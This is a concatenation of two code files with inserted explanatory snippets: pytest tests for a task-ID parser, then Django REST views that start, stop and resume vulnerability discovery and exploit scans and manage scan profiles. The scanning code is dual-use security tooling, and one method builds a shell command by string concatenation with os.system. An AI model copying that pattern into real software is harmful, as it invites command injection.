# ---- File: kpolyakov_parsing/tests/test_input_loading.py (repo: SteamPeKa/scripts_for_Aecatta, MIT license) ----
# coding=utf-8
# Creation date: 08 Dec 2020
# Creation time: 13:07
# Creator: SteamPeKa
import os
# noinspection PyProtectedMember
import kpolyakov_parsing._input_loading
class TestSimpleTask(object):
def test_create_case_1(self):
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
def test_create_case_2(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("3", "4")
def test_create_case_3(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("B5", "6")
def test_create_case_4(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("B7", "TASK8")
def test_create_case_5(self):
buster = kpolyakov_parsing._input_loading.SimpleTask(object(), object())
def test_fields_case_1(self):
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert isinstance(buster.USE_task_key, int)
assert buster.USE_task_key == 1
assert isinstance(buster.task_bank_key, int)
assert buster.task_bank_key == 2
def test_fields_case_2(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("3", "4")
assert isinstance(buster.USE_task_key, int)
assert buster.USE_task_key == 3
assert isinstance(buster.task_bank_key, int)
assert buster.task_bank_key == 4
def test_fields_case_3(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("B5", "6")
assert isinstance(buster.USE_task_key, str)
assert buster.USE_task_key == "B5"
assert isinstance(buster.task_bank_key, int)
assert buster.task_bank_key == 6
def test_fields_case_4(self):
buster = kpolyakov_parsing._input_loading.SimpleTask("B7", "TASK8")
assert isinstance(buster.USE_task_key, str)
assert buster.USE_task_key == "B7"
assert isinstance(buster.task_bank_key, str)
assert buster.task_bank_key == "TASK8"
def test_fields_case_5(self):
USE_key = object()
task_key = object()
buster = kpolyakov_parsing._input_loading.SimpleTask(USE_key, task_key)
assert isinstance(buster.USE_task_key, str)
assert buster.USE_task_key == str(USE_key)
assert isinstance(buster.task_bank_key, str)
assert buster.task_bank_key == str(task_key)
def test_hash_case_1(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert hash(buster) == hash(tester)
def test_hash_case_2(self):
tester = kpolyakov_parsing._input_loading.SimpleTask("1", 2)
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert hash(buster) == hash(tester)
def test_hash_case_3(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(1, "2")
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert hash(buster) == hash(tester)
def test_hash_case_4(self):
tester = kpolyakov_parsing._input_loading.SimpleTask("1", "2")
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert hash(buster) == hash(tester)
def test_eq_case_1(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert buster == tester
assert tester == buster
buster = kpolyakov_parsing._input_loading.SimpleTask(3, 4)
assert buster != tester
assert tester != buster
def test_eq_case_2(self):
tester = kpolyakov_parsing._input_loading.SimpleTask("1", 2)
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert buster == tester
assert tester == buster
buster = kpolyakov_parsing._input_loading.SimpleTask("3", 4)
assert buster != tester
assert tester != buster
def test_eq_case_3(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(1, "2")
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert buster == tester
assert tester == buster
buster = kpolyakov_parsing._input_loading.SimpleTask(3, "4")
assert buster != tester
assert tester != buster
    def test_eq_case_4(self):
tester = kpolyakov_parsing._input_loading.SimpleTask("1", "2")
buster = kpolyakov_parsing._input_loading.SimpleTask(1, 2)
assert buster == tester
assert tester == buster
buster = kpolyakov_parsing._input_loading.SimpleTask("3", "4")
assert buster != tester
assert tester != buster
def test_cmp_case_1(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(5, 5)
        buster = kpolyakov_parsing._input_loading.SimpleTask(4, 5)  # Lesser
assert (buster < tester) is True
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is False
assert (buster > tester) is False
assert (tester > buster) is True
assert (buster >= tester) is False
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask("5", 5) # Equal
assert (buster < tester) is False
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is True
assert (buster > tester) is False
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask(6, 5) # Greater
assert (buster < tester) is False
assert (tester < buster) is True
assert (buster <= tester) is False
assert (tester <= buster) is True
assert (buster > tester) is True
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is False
def test_cmp_case_2(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(5, 5)
        buster = kpolyakov_parsing._input_loading.SimpleTask(5, 4)  # Lesser
assert (buster < tester) is True
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is False
assert (buster > tester) is False
assert (tester > buster) is True
assert (buster >= tester) is False
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask(5, "5") # Equal
assert (buster < tester) is False
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is True
assert (buster > tester) is False
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask(5, 6) # Greater
assert (buster < tester) is False
assert (tester < buster) is True
assert (buster <= tester) is False
assert (tester <= buster) is True
assert (buster > tester) is True
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is False
def test_cmp_case_3(self):
tester = kpolyakov_parsing._input_loading.SimpleTask(5, 5)
        buster = kpolyakov_parsing._input_loading.SimpleTask(4, 4)  # Lesser
assert (buster < tester) is True
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is False
assert (buster > tester) is False
assert (tester > buster) is True
assert (buster >= tester) is False
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask("5", "5") # Equal
assert (buster < tester) is False
assert (tester < buster) is False
assert (buster <= tester) is True
assert (tester <= buster) is True
assert (buster > tester) is False
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is True
buster = kpolyakov_parsing._input_loading.SimpleTask(6, 6) # Greater
assert (buster < tester) is False
assert (tester < buster) is True
assert (buster <= tester) is False
assert (tester <= buster) is True
assert (buster > tester) is True
assert (tester > buster) is False
assert (buster >= tester) is True
assert (tester >= buster) is False
class TestTaskBatch(object):
    # TODO: write tests for the batches
pass
class TestLoadFromTxt(object):
def test_load_from_path(self):
path = os.path.join("tests", "test_data.txt")
tester = {
(25, 7), (25, 11), (25, 28), (25, 31), (25, 50), (25, 67),
(11, 6), (11, 10), (11, 81), (11, 25), (11, 61), (11, 13), (11, 79),
}
buster = set()
for simple_task in kpolyakov_parsing._input_loading.load_from_txt(path=path):
buster.add((simple_task.USE_task_key, simple_task.task_bank_key))
assert len(tester ^ buster) == 0, "{{{}}} != {{{}}}. Symmetrical difference: {{{}}}".format(
", ".join(str(a) for a in tester),
", ".join(str(a) for a in buster),
", ".join(str(a) for a in (tester ^ buster))
)
def test_load_from_file(self):
path = os.path.join("tests", "test_data.txt")
tester = {
(25, 7), (25, 11), (25, 28), (25, 31), (25, 50), (25, 67),
(11, 6), (11, 10), (11, 81), (11, 25), (11, 61), (11, 13), (11, 79),
}
buster = set()
with open(path, "r") as f:
for simple_task in kpolyakov_parsing._input_loading.load_from_txt(file=f):
buster.add((simple_task.USE_task_key, simple_task.task_bank_key))
assert len(tester ^ buster) == 0, "{{{}}} != {{{}}}. Symmetrical difference: {{{}}}".format(
", ".join(str(a) for a in tester),
", ".join(str(a) for a in buster),
", ".join(str(a) for a in (tester ^ buster))
)
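A standalone illustration (example pairs only) of the set symmetric-difference check the tests above use to compare the expected and parsed (USE_key, bank_key) tuples:

```python
tester = {(25, 7), (11, 6)}    # expected pairs
buster = {(25, 7), (11, 13)}   # parsed pairs
diff = tester ^ buster         # empty iff the two sets match exactly
print(sorted(diff))  # -> [(11, 6), (11, 13)]
```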
# ---- File: Dictator_service/views.py (repo: FurqanKhan1/Dictator, Unlicense) ----
"""
@Author : Furqan Khan
@Email  : furqankhan08@gmail.com
@Date   : 1/3/2017

Objective :
The purpose of this file/module/class is to serve the REST requests.
Depending upon the requested URL, the views module fetches the data from the backend
Python files, transforms the data to JSON format, and finally returns the data back to the
requesting application.
"""
from django.shortcuts import render
from Dictator_service.serializers import UserSerializer,ScanAttributes,ProfileAttributes,General,ProjectSerializer,Configuration,test_multi,Exploits,UploadXml,UploadXmlNmap,Poll_me,Polling_,ExploitsConcurrent,Merge_reports,OnFly
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser,MultiPartParser,FormParser,FileUploadParser
from rest_framework import status
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt,csrf_protect
from django.views.decorators.csrf import ensure_csrf_cookie
from django.utils.decorators import method_decorator
from wsgiref.util import FileWrapper
import Gui_main_driver
import json
import os
import nmap_parser
import FileValidator
import Polling
import uuid
import Nessus_parser
import Qualys_parser
import Report_orchestration
import Exploit_mapping
import zipfile
import IPtable,IPexploits
import ValidateProfile
#from Dictator.Dictator_service.bin_gui_1 import compiler #import *
# Create your views here.
class SetCsrf(APIView):
"""
Objective :
This class is only for test purpose and it forces the framework to generate a csrf token
with custom authentication
"""
@method_decorator(ensure_csrf_cookie)
def get(self,request,format=None):
        return Response(JSONRenderer().render({"hello": "world"}))
class InitDirectory():
def __init__(self):
self.folder_dir=os.path.dirname(os.path.realpath(__file__))
self.results_path=os.path.join(self.folder_dir,"Results")
self.profiles_path=os.path.join(self.folder_dir,"Profiles")
self.folder_name=os.path.join(self.results_path,"Data_")
def init_project_directory(self):
try:
if not os.path.exists(self.folder_name+str(self.project_id)):
os.mkdir(self.folder_name+str(self.project_id))
s_path=os.path.join(self.results_path,'bk')
os.system("cp -r "+s_path+ " "+ self.folder_name+str(self.project_id)+"/")
self.data_path=self.folder_name+str(self.project_id)
return 1;
        except Exception, ee:
            print "Error while creating the project directory: " + str(ee)
            return -1
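A minimal sketch of the per-project results path this class assembles, i.e. `<module dir>/Results/Data_<project_id>` (the base directory here is an assumed stand-in for the directory of `__file__`):

```python
import os

folder_dir = "/opt/dictator"   # assumed base, stands in for the module's directory
results_path = os.path.join(folder_dir, "Results")
folder_name = os.path.join(results_path, "Data_")
# init_project_directory appends the numeric project id to this prefix
print(folder_name + str(7))  # -> /opt/dictator/Results/Data_7
```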
class UserList(APIView):
"""
Objective :
The code is only for testing purpose and has no utility with final draft of code
"""
def get(self,request,format=None):
Employee_dict={}
Employee_list=[]
Employee_dict["id"]=1
Employee_dict["name"]="Furqan Khan"
Employee_list.append(Employee_dict)
Employee_dict={}
Employee_dict["id"]=2
Employee_dict["name"]="Burhan Khan"
Employee_list.append(Employee_dict)
serialize=UserSerializer(Employee_list,many=True)
return Response(JSONRenderer().render(serialize.data))
#return JSONResponse(serialize.data)
class StartScanConcurrent(APIView):
"""
Objective :
The objective of this class is to serve the Post method which would take the scan attributes
and would invoke appropriate backend python files Gui_main_driver.py to start the scan as a process.
Note :This class would invoke the dicovery and vulnerability scanning in concurrent mode.
IN order to understand about input given to this method and response returned read API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
        print "Request Hit :"
#data_=JSONParser().parse(request)
scan_attributes=ScanAttributes(data=request.data)
#scan_attributes=ScanAttributes(data=data_)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
profile_id=int(scan_attributes.data["profile"])
dir_obj=InitDirectory()
profile=ValidateProfile.Profile()
if scan_attributes.data["edit_profile"]=="1":
try:
profile_json=json.loads(scan_attributes.data["profile_json"])
except Exception ,exc:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(exc)
return_response["value"]="Exception : "+str(exc)
return Response(JSONRenderer().render(return_response))
is_valid=profile.validateProfile(profile_id,profile_json)
if is_valid in [-1, -2] :
return_response["status"]="failure"
return_response["errors"]="Invalid Json Data / Value passed for Profile"
return_response["value"]="Invalid Json Data / Value passed for Profile"
return Response(JSONRenderer().render(return_response))
elif is_valid != 1:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(is_valid)
return_response["value"]="Exception : "+str(is_valid)
return Response(JSONRenderer().render(return_response))
scan_id=obj.main_start(scan_attributes.data["project_name"],scan_attributes.data["IP_range"],scan_attributes.data["Port_range"],scan_attributes.data["switch"],"1","init",int(scan_attributes.data["profile"]),scan_attributes.data["assessment_id"],scan_attributes.data["app_id"],True)
if scan_id !=-1:
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(scan_id,'processing',True,True)
my_obj=IPtable.Projects()
my_obj.Update_mode(scan_id,'concurrent')
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
return_response["value"]=str(scan_id)
if scan_attributes.data["edit_profile"]=="1":
dir_obj.project_id=int(scan_id)
status=dir_obj.init_project_directory()
if status == -1:
return_response["status"]="failure"
return_response["value"]="Scan has started but Not able to create the Directory"
else:
stat=profile.CreateCustom(dir_obj.data_path,profile_json,str(scan_id),profile_id,scan_attributes.data["assessment_id"])
if stat["status"] !="success":
return_response["status"]="failure"
return_response["value"]=stat["value"]
else:
return_response["profile_id"]=stat["value"]
IPtable.Projects().UpdateProjectProfile(scan_id,stat["value"])
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
#return Response(return_response)
return Response(JSONRenderer().render(return_response))
class StartScan(APIView):
#@csrf_exempt
"""
Objective :
The objective of this class is to serve the Post method which would take the scan attributes
and would invoke appropriate backend python files Gui_main._driver.py to start the scan as a process
Note :This class will invoke the backend code in sequential mode
IN order to understand about input given to this method and response returned read API documentation.
"""
def post(self,request,format=None):
return_response={}
try:
scan_attributes=ScanAttributes(data=request.data)
if scan_attributes.is_valid():
obj=Gui_main_driver.Gui_main()
profile_id=int(scan_attributes.data["profile"])
dir_obj=InitDirectory()
profile=ValidateProfile.Profile()
#if profile_id in [4,5]:
if scan_attributes.data["edit_profile"]=="1":
try:
profile_json=json.loads(scan_attributes.data["profile_json"])
except Exception as exc:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(exc)
return_response["value"]="Exception : "+str(exc)
return Response(JSONRenderer().render(return_response))
is_valid=profile.validateProfile(profile_id,profile_json)
if is_valid in [-1, -2] :
return_response["status"]="failure"
return_response["errors"]="Invalid Json Data / Value passed for Profile"
return_response["value"]="Invalid Json Data / Value passed for Profile"
return Response(JSONRenderer().render(return_response))
elif is_valid != 1:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(is_valid)
return_response["value"]="Exception : "+str(is_valid)
return Response(JSONRenderer().render(return_response))
#if is_valid == 1:
scan_id=obj.main_start(scan_attributes.data["project_name"],scan_attributes.data["IP_range"],scan_attributes.data["Port_range"],scan_attributes.data["switch"],"1","init",int(scan_attributes.data["profile"]),scan_attributes.data["assessment_id"],scan_attributes.data["app_id"])
if scan_id != -1:
my_obj=IPtable.IPtable()
my_obj.Update_status_to_paused_or_processing(scan_id,'processing')
if scan_attributes.data["mode"]=="sequential_default":
#print "\n\n\n\nabout to update mode : "+ str(scan_attributes.data["mode"])
my_objj=IPtable.Projects()
my_objj.Update_mode(scan_id,'sequential_default')
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
#print "About to return the response :"+str(return_response)
return_response["value"]=str(scan_id)
if scan_attributes.data["edit_profile"]=="1":
dir_obj.project_id=int(scan_id)
status=dir_obj.init_project_directory()
if status == -1:
return_response["status"]="failure"
return_response["value"]="Scan has started but not able to create the directory"
else:
stat=profile.CreateCustom(dir_obj.data_path,profile_json,str(scan_id),profile_id,scan_attributes.data["assessment_id"])
if stat["status"] !="success":
return_response["status"]="failure"
return_response["value"]=stat["value"]
else:
return_response["profile_id"]=stat["value"]
IPtable.Projects().UpdateProjectProfile(scan_id,stat["value"])
else:
return_response["status"]="failure"
return_response["value"]="-1"
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
#return Response(return_response)
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
#return Response(return_response)
return Response(JSONRenderer().render(return_response))
def get(self,request,format=None):
Employee_dict={}
Employee_list=[]
Employee_dict["id"]=1
Employee_dict["name"]="Furqan Khan"
Employee_list.append(Employee_dict)
Employee_dict={}
Employee_dict["id"]=2
Employee_dict["name"]="Burhan Khan"
Employee_list.append(Employee_dict)
serialize=UserSerializer(Employee_list,many=True)
return Response(serialize.data)
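Every handler in these views builds the same failure payload by hand: a fixed `status`, with the same message mirrored into both `errors` and `value`. A minimal sketch of a shared helper (the name `failure_response` is hypothetical, not part of this codebase) that captures the pattern:

```python
def failure_response(message, extra=None):
    # Build the standard failure payload used by these API views:
    # "status" is fixed, and the same message is mirrored into both
    # "errors" and "value", matching the handlers above.
    resp = {"status": "failure", "errors": message, "value": message}
    if extra:
        # Optional extra keys such as "project_id" or "response_code".
        resp.update(extra)
    return resp
```

Each `except` branch could then collapse to something like `return Response(JSONRenderer().render(failure_response(str(ee))))`, assuming the handlers keep the current payload shape.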
class ScanProfile(APIView):
def __init__(self):
self.folder_dir=os.path.dirname(os.path.realpath(__file__))
self.Mapper_Json=os.path.join(self.folder_dir,"mapper.json")
def return_json(self,json_file):
with open(json_file,"r") as fp:
all_json=json.load(fp)
return all_json
def get(self,request,format=None):
try:
response_text={}
return_response={}
response_text["status"]="success"
profile_id=request.data["profile_id"]
print "profile id is : "+str(profile_id) +str(type(profile_id))
if type(profile_id)==type([]):
print "Type list"
profile_id=profile_id[0]
print "obtained"
print "id is : "+str(profile_id)
if 1:#int(profile_id )!=0:
ret_val=IPtable.Projects().Profile(profile_id)
print str(ret_val)
profile=ret_val[0]
#print "Output is : "+str(profile) +str(profile_list)
if profile ==-1:
return_response["status"]="failure"
return_response["errors"]="Some error occurred. Profile not found"
return_response["value"]="Some error occurred. Profile not found"
return Response(JSONRenderer().render(return_response))
#return
if profile=="Master":
profile_file=os.path.join(self.folder_dir,"Master.json")
elif profile=="Custom_Mandatory" or profile=="Mandatory":
profile_file=os.path.join(self.folder_dir,"Mandatory.json")
elif profile=="Custom_Analytical" or profile=="Analytical":
profile_file=os.path.join(self.folder_dir,"Analytical.json")
else:
profile_file=ret_val[1]
c={}
with open(profile_file,"r") as custom_json:
c["data"]=json.load(custom_json)
c["id"]=ret_val[2]
c["name"]=ret_val[0]
#print "Length is : "+str(len(custom_j))
response_text["Custom_json"]=c
response_text["Mapper_json"]=self.return_json(self.Mapper_Json)
return Response(JSONRenderer().render(response_text))
except Exception as ee:
print "Exception @@: "+str(ee)
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
def post(self,request,format=None):
try:
response_text={}
response_text["status"]="success"
profile_id=request.data["profile_id"]
ret_val=IPtable.Projects().ShareProfile(profile_id)
return Response(JSONRenderer().render(ret_val))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ScanProfiles(APIView):
def __init__(self):
self.folder_dir=os.path.dirname(os.path.realpath(__file__))
self.results_path=os.path.join(self.folder_dir,"Results")
self.folder_name=os.path.join(self.results_path,"Data_")
self.All_Json=os.path.join(self.folder_dir,"all_commands.json")
self.Master_Json=os.path.join(self.folder_dir,"Master.json")
self.Mandatory_Json=os.path.join(self.folder_dir,"Mandatory.json")
self.Analytical_Json=os.path.join(self.folder_dir,"Analytical.json")
self.Mapper_Json=os.path.join(self.folder_dir,"mapper.json")
def return_json(self,json_file):
with open(json_file,"r") as fp:
all_json=json.load(fp)
return all_json
def get(self,request,format=None):
try:
print "Hello, received request !!"
response_text={}
response_text["status"]="success"
response_text["All_json"]=self.return_json(self.All_Json)
response_text["Master_json"]=self.return_json(self.Master_Json)
response_text["Mandatory_json"]=self.return_json(self.Mandatory_Json)
response_text["Analytical_json"]=self.return_json(self.Analytical_Json)
response_text["Mapper_json"]=self.return_json(self.Mapper_Json)
response_text["Custom_json"]=''
#print str(request.data["profile_ids"])
profile_ids=request.data["profile_ids"]
print "profile id is --->: "+str(profile_ids) +str(type(profile_ids))
if profile_ids !=0:
print "Not zero !" +str(profile_ids)
ret_val=IPtable.Projects().Profile('',True,profile_ids)
if ret_val["status"]=="success":
print "success @@@@"
custom_json_files=ret_val["value"]
custom_j=[]
for custom in custom_json_files:
print custom["id"]
c={}
c["id"]=custom["id"]
c["name"]=custom["name"]
#with open (custom["path"],"r+") as custom_json:
# c["data"]=json.loads(custom_json.read())
custom_j.append(c)
print "Length is : "+str(len(custom_j))
response_text["Custom_json"]=custom_j
return Response(JSONRenderer().render(response_text))
except Exception as ee:
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
def post(self,request,format=None): #Creating a new Custom Profile
try:
return_response={}
profile_attributes=ProfileAttributes(data=request.data)
if profile_attributes.is_valid():
obj=Gui_main_driver.Gui_main()
profile_id=int(profile_attributes.data["profile_id"])
print "Obtained Profile id : is " +str(profile_id)
if profile_id not in [1,2,3,4,5]:
return_response["status"]="failure"
return_response["errors"]="Custom Profile can be inherited only from Master, Mandatory and Analytical Profiles"
return_response["value"]="Custom Profile can be inherited only from Master, Mandatory and Analytical Profiles"
return Response(JSONRenderer().render(return_response))
profile_name=profile_attributes.data["profile_name"]
dir_obj=InitDirectory()
profile=ValidateProfile.Profile()
try:
profile_json=json.loads(profile_attributes.data["profile_json"])
ass_id=profile_attributes.data["assessment_id"]
is_valid=profile.validateProfile(profile_id,profile_json)
if is_valid in [-1, -2] :
return_response["status"]="failure"
return_response["errors"]="Invalid Json Data / Value passed for Profile"
return_response["value"]="Invalid Json Data / Value passed for Profile"
return Response(JSONRenderer().render(return_response))
elif is_valid != 1:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(is_valid)
return_response["value"]="Exception : "+str(is_valid)
return Response(JSONRenderer().render(return_response))
else:
custom_file=os.path.join(dir_obj.profiles_path,str(ass_id)+str(".json"))
save_p=IPtable.Projects().SaveProfile(custom_file,ass_id,profile_name,"Custom")
if save_p["status"]=="success":
with open(custom_file,"w") as custom:
custom.write(json.dumps(profile_json,indent=4))
else:
save_p["value"]="Kindly check if you are giving a unique name to your profile"
return Response(JSONRenderer().render(save_p))
except Exception as exc:
return_response["status"]="failure"
return_response["errors"]="Exception : "+str(exc)
return_response["value"]="Exception : "+str(exc)
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["errors"]=profile_attributes.errors
return_response["value"]=profile_attributes.errors
#return Response(return_response)
return Response(JSONRenderer().render(return_response))
except Exception as ex:
return_response={}
return_response["status"]="failure"
return_response["errors"]=str(ex)
return_response["value"]=str(ex)
return Response(JSONRenderer().render(return_response))
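In ScanProfiles.post above, the custom profile is persisted as `<assessment_id>.json` under the project's profiles directory, pretty-printed with `indent=4`. A standalone sketch of that write step (the helper name `write_profile` is hypothetical):

```python
import json
import os
import tempfile

def write_profile(profiles_path, assessment_id, profile_json):
    # Persist a custom profile as <assessment_id>.json, pretty-printed
    # with indent=4 as in ScanProfiles.post. Returns the path written.
    custom_file = os.path.join(profiles_path, str(assessment_id) + ".json")
    with open(custom_file, "w") as fp:
        fp.write(json.dumps(profile_json, indent=4))
    return custom_file
```

In the actual view the database row is saved first (via `SaveProfile`) so that a duplicate profile name fails before any file is written; the sketch covers only the file side.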
class StopScan(APIView):
"""
Objective :
The objective of this class is to serve the POST method, which takes the scan/project id
and invokes the appropriate backend file Gui_main_driver.py to stop the scan.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
#@csrf_exempt
#@method_decorator(csrf_protect)
def post(self,request,format=None):
return_response={}
try:
scan_attributes=General(data=request.data)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
scan_id=obj.main_pause(scan_attributes.data["project_id"],'','')
if scan_id !=0:
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
else:
return_response["status"]="failure"
return_response["response_code"]=str(scan_id)
return_response["value"]=str(scan_id)
#return Response(JSONRenderer().render(return_response))
return Response(JSONRenderer().render(return_response))
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class StopScanConc(APIView):
"""
Objective :
The objective of this class is to serve the POST method, which takes the scan/project id
and invokes the appropriate backend file Gui_main_driver.py to stop the scan.
Note : This class serves the purpose of stopping a concurrent scan; it pauses
both the discovery and the vulnerability scanning phase.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
try:
scan_attributes=General(data=request.data)
return_response={}
pause_discovery=True
pause_exploits=True
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
my_obj=IPtable.IPtable()
stat=IPtable.Projects().fetch_project_status(scan_attributes.data["project_id"])
if stat["status"]=="success":
if stat["value"]["project_status"]=="complete":
pause_discovery=False
if stat["value"]["project_exploits_status"]=="complete":
pause_exploits=False
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["errors"]="Scan status could not be fetched"
return_response["value"]="Scan status could not be fetched !!!"
return Response(JSONRenderer().render(return_response))
if pause_discovery:
scan_id=obj.main_pause(scan_attributes.data["project_id"],'','')
if pause_exploits:
scan_id=obj.exploits_pause(scan_attributes.data["project_id"],True)
if pause_discovery or pause_exploits:
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["response_code"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["errors"]="Can't pause a scan whose status is complete"
return_response["value"]="Can't pause a scan whose status is complete"
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class Switches(APIView):
def get(self,request,format=None):
try:
ret_val={}
switches={}
obj=IPtable.IPtable()
resp=obj.getSwitch()
return Response(JSONRenderer().render(resp))
except Exception as ex:
ret_val["status"]="failure"
ret_val["value"]=str(ex)
return Response(JSONRenderer().render(ret_val))
class ResumeScanConc(APIView):
"""
Objective :
The objective of this class is to serve the POST method, which takes the scan/project id
and invokes the appropriate backend file Gui_main_driver.py to resume the paused scan.
Note : This class serves the purpose of resuming a concurrent scan; it resumes
both the discovery and the vulnerability scanning phase.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
try:
scan_attributes=General(data=request.data)
return_response={}
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
obj=Gui_main_driver.Gui_main()
my_obj=IPtable.IPtable()
stat=IPtable.Projects().fetch_project_status(scan_attributes.data["project_id"])
if stat["status"]=="success":
if stat["value"]["project_status"]=="complete":
my_obj.Update_status_to_paused_or_processing(scan_attributes.data["project_id"],'complete',False,False)
my_obj.Update_status_to_paused_or_processing(scan_attributes.data["project_id"],'processing',True,False)
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=scan_attributes.data["project_id"]
return_response["value"]=scan_attributes.data["project_id"]
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["errors"]="Scan status could not be fetched"
return_response["value"]="Scan status could not be fetched !!!"
return Response(JSONRenderer().render(return_response))
scan_id=obj.main_resume(scan_attributes.data["project_id"],'','',True)
if scan_id !=-1:
my_obj.Update_status_to_paused_or_processing(scan_attributes.data["project_id"],'processing',True,True)
return_response["status"]="success" #+str(scan_attributes.data["project_name"])
return_response["project_id"]=str(scan_id)
return_response["value"]=str(scan_id)
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure" #+str(scan_attributes.data["project_name"])
return_response["errors"]="Scan could not be resumed. Some error occurred"
return_response["value"]="Some error occurred and the scan did not resume"
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["errors"]=scan_attributes.errors
return_response["value"]=scan_attributes.errors
return Response(JSONRenderer().render(return_response))
except Exception as ee:
return_response["status"]="failure"
return_response["errors"]=str(ee)
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class StopExploits(APIView):
"""
Objective :
The objective of this class is to serve the POST method, which takes the scan/project id
and invokes the appropriate backend file Gui_main_driver.py to stop the vulnerability scan.
In order to understand the input given to this method and the response returned, read the API documentation.
"""
#@csrf_exempt
def post(self,request,format=None):
try:
return_response={}
scan_attributes=General(data=request.data)
if scan_attributes.is_valid():
#return Response(scan_attributes.data)
try:
concurrent=request.data["concurrent"]
except Exception as ex:
return_response["status"]="failure"
return_response["errors"]="Required Concurrent Field"
return_response["value"]="Required Concurrent Field"
return Response(JSONRenderer().render(return_response))
obj=Gui_main_driver.Gui_main()
